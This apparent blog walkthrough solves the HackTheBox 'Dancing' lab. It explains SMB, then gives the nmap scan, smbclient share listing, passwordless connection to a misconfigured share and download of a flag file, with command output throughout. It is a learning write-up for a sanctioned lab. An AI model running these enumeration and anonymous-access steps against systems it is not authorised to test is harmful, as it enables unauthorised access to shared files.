HackTheBox Dancing (Windows Room) — Full Walkthrough
This article covers a mix of theoretical knowledge and hands-on practice focused on the SMB (Server Message Block) protocol. Using the Dancing room on HackTheBox, I demonstrate how basic SMB enumeration works in a real environment and how misconfigured shares can lead to sensitive data exposure.
Task 1 – What is SMB?
SMB (Server Message Block) is a network file-sharing protocol that allows applications and users to read, write, and request services from devices on a network. It is commonly used in Windows environments for file sharing, printer access, and inter-process communication.
Task 2 – What Port Does SMB Use?
SMB primarily operates on TCP port 445. Older implementations may also use ports 139/NetBIOS, but modern systems rely on 445.
Task 3 – Identifying SMB via Nmap
To confirm SMB exposure, I ran an Nmap service scan against the target.
┌──(unknown㉿kali)-[~]
└─$ nmap -Pn -sV 10.129.32.21
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-08 11:44 EST
Nmap scan report for 10.129.32.21
Host is up (0.44s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Relevant output:
- 445/tcp –
microsoft-ds
This confirms that the SMB service is running and accessible on the target machine.
Task 4 – Listing SMB Shares
The smbclient utility can be used to enumerate available shares. The -L flag lists all shares exposed by the target.
┌──(unknown㉿kali)-[~]
└─$ smbclient -L 10.129.32.21
Password for [WORKGROUP\unknown]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
This command prompted for a password but still returned a list of accessible shares.
Task 5 – Enumerating Available Shares
From the enumeration results, the following shares were identified:
ADMIN$C$IPC$WorkShares
Total shares discovered: 4
Task 6 – Accessing a Share with a Blank Password
The WorkShares share allowed access without authentication. Using the --no-pass option, I connected directly to the share.
smbclient --no-pass //10.129.32.21/WorkShares
Inside the share, I found directories belonging to two users:
Amy.JJames.P
Task 7 – Downloading Files from SMB
Within the SMB interactive shell, the get command can be used to download files to the local machine.
smb: \> cd James.p
smb: \James.p\> ls
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
5114111 blocks of size 4096. 1734201 blocks available
smb: \James.p\> get flag.txt
getting file \James.p\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
The file was successfully transferred to my local system.
Capturing the Flag
After downloading the file, I verified its contents locally.
┌──(unknown㉿kali)-[~]
└─$ cat flag.txt
The flag confirms successful enumeration and data access via SMB.
More walkthroughs and beginner-friendly explanations coming soon as I continue documenting my hands-on learning journey